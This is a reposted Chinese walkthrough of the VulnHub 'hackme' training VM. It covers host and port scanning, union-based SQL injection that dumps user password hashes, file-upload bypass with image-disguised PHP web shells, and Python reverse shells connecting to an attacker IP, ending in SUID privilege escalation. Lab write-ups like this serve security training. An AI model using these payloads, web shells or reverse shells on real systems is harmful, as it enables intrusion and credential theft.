摘要:目标是通过漏洞获得有限的权限访问,然后权限升级为。使用,并且在可能自行关闭的情况下非常罕见的情况,尝试强制重新启动机器,然后机器应该可以正常工作。
靶机基本信息:
链接 | https://www.vulnhub.com/entry/hackme-1,330/ |
---|---|
发布时间 | 18 Jul 2019 |
作者 | x4bx54 |
难度 | 简单 |
靶机基本介绍:
“hackme”是一个初学者难度等级框。目标是通过web漏洞获得有限的权限访问,然后权限升级为root。这个实验室是为了模拟现实生活环境而创建的。
“hackme”使用DHCP,并且在mysqld可能自行关闭的情况下(非常罕见的情况),尝试强制重新启动机器,然后机器应该可以正常工作。
与VMware相比,VirtualBox的效果更好
下载并导入靶机
打开vmware–文件–打开–hackme.ova
查看网络适配器
将靶机网络适配器改为NAT模式
启动靶机
点击 ▶靶机,开启成功
arpscan -l
masscan --rate=100000 -p 0-65535 192.168.30.207
nmap -T4 -sV -O -p 22,80 192.168.30.207
dirb http://192.168.30.207 /usr/share/dirb/wordlists/big.txt
(2)gobuster目录扫描
gobuster dir -e -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,zip,html -u http://192.168.30.207 -t 30
whatweb http://192.168.30.207
登录主页发现登录页面,而且还可以注册用户
注册用户admin 密码123456
登录admin用户
单击search可以进行查看到很多的书名
验证sql注入
Windows OS" and 1=1#
Windows OS" and 1=2#
由以上验证出此处存在字符型(单引号)sql注入
Windows OS" order by 3#
Windows OS" order by 4#
可以看出这里字段数为3
-1" union select 1,2,3#
-1" union select database(),2,3#
-1" union select group_concat(table_name),2,3 from information_schema.tables where table_schema="webapphacking"#
-1" union select group_concat(column_name),2,3 from information_schema.columns where table_name="users"#
10.查看表中user,password
-1" union select group_concat(user),group_concat(pasword),3 from users#
user1 5d41402abc4b2a76b9719d911017c592 hellouser2 6269c4f71a55b24bad0f0267d9be5508 commandouser3 0f359740bd1cda994f8b55330c86d845 p@ssw0rdtest 05a671c66aefea124cc08b76ea6d30bb testtestsuperadmin 2386acb2cf356944177746fc92523983 Uncrackabletest1 05a671c66aefea124cc08b76ea6d30bb testtestadmin e10adc3949ba59abbe56e057f20f883e 123456123456 e10adc3949ba59abbe56e057f20f883e 123456
这里只截了三张图,其他的解密也一样,后面两个用户(admin,123456)是我自己刚刚在网页注册的
使用superadmin用户登录
发现文件上传点
制作假图片头
GIF89a<?php phpinfo(); ?>
上传前先开启burp抓包
http://192.168.30.207/uploads/访问路径http://192.168.30.207/uploads/phpinfo.php
该上传点存在文件上传漏洞,并且假图片头与图片马均可以
@eval($_POST[shell]); ?>
copy a.jpg/b + tu.php/a b.jpg
同上面上传phpinfo.jpg一样,上传图片马
抓包–修改后缀–发送,可以看出上传成功
访问上传的图片马
http://192.168.30.207/uploads/b.php
5. 上传反弹shell脚本
将反弹shell放在网站根目录下,开启http服务
import socket,subprocess,oss=socket.socket(socket.AF_INET,socket.SOCK_STREAM)s.connect(("192.168.30.182",1234))os.dup2(s.fileno(),0)os.dup2(s.fileno(),1)os.dup2(s.fileno(),2)p=subprocess.call(["/bin/bash","-i"])
service apache2 start
wget http://192.168.30.182/shell.py
kali监听1234端口
运行
反弹shell成功
@system($_GET([cmd]);?>
合成图片马(与方法一合成方法相同)
copy a.jpg/b + sysexec.php/a sysexec3.jpg
nc -vnlp 7777
http://192.168.30.207/uploads/stsexec3.php?cmd=python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.30.182",7777));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"])"
5. 反弹shell成功
cat /etc/passwd | grep /bin/bash
./touchmenot
提权成功
这个靶机考察了目录搜集,sql注入,文件上传漏洞,反弹shell等内容,在渗透的过程中需要灵活应对每一个环节,靶机难度比较简单
文章版权归作者所有,未经允许请勿转载,若此文章存在违规行为,您可以联系管理员删除。
转载请注明本文地址:https://www.ucloud.cn/yun/119200.html
摘要:按照网上的说法,代码保存后会执行代码,这应该是在靶机上已经执行了代码,只是在后台不会显示出来。 目录 靶机DC-8 (详细渗透,适合新手渗透)0x01靶机描述0x...
靶机SickOs1.2的目录 0x01靶机描述0x02环境搭建0x03靶机渗透一、 信息收集二、 漏洞挖掘PUT方法任意写文件漏洞1. 查看web主页2. 查看/test目录支持的方法3. 验证PUT方法,向服务器写入文件4. 访问写入的文件 三、 漏洞利用反弹shell方法一:php一句话木马 + 蚁剑连接反弹shell方法二:curl上传php反弹shell脚本反弹shell方法三:...
摘要:目标是通过漏洞获得有限的权限访问,并随后以根用户身份升级权限。使用,并且在可能自行关闭的情况下非常罕见的情况,尝试强制重新启动机器,然后机器应该可以正常工作。 靶...
靶机FristiLeaks1.3的目录 0x01靶机描述0x02环境搭建0x03靶机渗透一、 信息收集1. 主机发现2. 端口扫描3. 详细扫描4. dirb目录扫描5. 网站指纹识别 二、 漏洞挖掘base64解密1. 寻找url2. 查看源码,base64解密3. 登录成功 文件上传漏洞1. 尝试修改抓包修改后缀进行绕过,失败2. 进行多后缀文件上传3. 打开上传的文件,显示出...
摘要:第一篇在此平台发布实战内容,有多处不足请多指教,本次内容详解漏洞利用与加固。 第一篇在此平台发布实战内容,有多处不足请多指教,本次内容详解ms14-064漏洞利用与加固。 任务环境说明: 渗透机:Kali Linux 靶机:Microsoft Windows XP 渗透机IP:172.16...
阅读 1528·2023-04-25 20:16
阅读 3453·2021-10-09 09:54
阅读 911·2021-09-06 15:00
阅读 2258·2021-09-04 16:46
阅读 2439·2021-09-04 16:40
阅读 2320·2019-08-30 15:55
阅读 726·2019-08-29 12:37
阅读 2610·2019-08-26 13:55